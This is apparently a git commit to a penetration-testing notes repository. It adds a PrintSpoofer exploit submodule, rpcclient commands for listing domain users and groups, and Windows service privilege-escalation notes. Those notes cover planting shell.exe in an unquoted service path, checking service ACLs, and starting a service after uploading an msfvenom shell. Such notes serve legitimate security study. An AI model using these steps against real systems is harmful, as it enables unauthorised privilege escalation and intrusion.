This commit is contained in:
Stefan Friese 2022-02-26 01:01:44 +01:00
parent d08a37a97d
commit 32fa6a672b
5 changed files with 41 additions and 0 deletions

3
.gitmodules vendored
View File

@ -136,3 +136,6 @@
[submodule "stego/stego-toolkit"] [submodule "stego/stego-toolkit"]
path = stego/stego-toolkit path = stego/stego-toolkit
url = https://github.com/DominicBreuker/stego-toolkit.git url = https://github.com/DominicBreuker/stego-toolkit.git
[submodule "exploit/windows/printspoofer"]
path = exploit/windows/printspoofer
url = https://github.com/dievus/printspoofer.git

View File

@ -0,0 +1,3 @@
# Bloodhound
* DNS

View File

@ -0,0 +1,10 @@
# RPCclient
* Enumerate users and groups
```sh
rpcclient <domain> <users>
rpcclient $> enumdomusers
...
rpcclient $> enumdomgroups
```

View File

@ -14,3 +14,27 @@ copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start <service> net start <service>
``` ```
## Intel about Service
* Access should contain writeable
```sh
Get-Acl -Path <path> | Format-List
```
* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1`
* Check `ServiceRights` via
```sh
"<servicename>" | Get-ServiceAcl | select ExpandProperty Access
```
## Interacting with the Service
* Upload msfvenom shell to the writeable path, setup listener and
```sh
sc start "servicename"
Stop-Service -name "servicename"
Start-Service -name "servicename"
```

@ -0,0 +1 @@
Subproject commit 29a9e27f5418317bd5f4560ccfebcb65ca181b32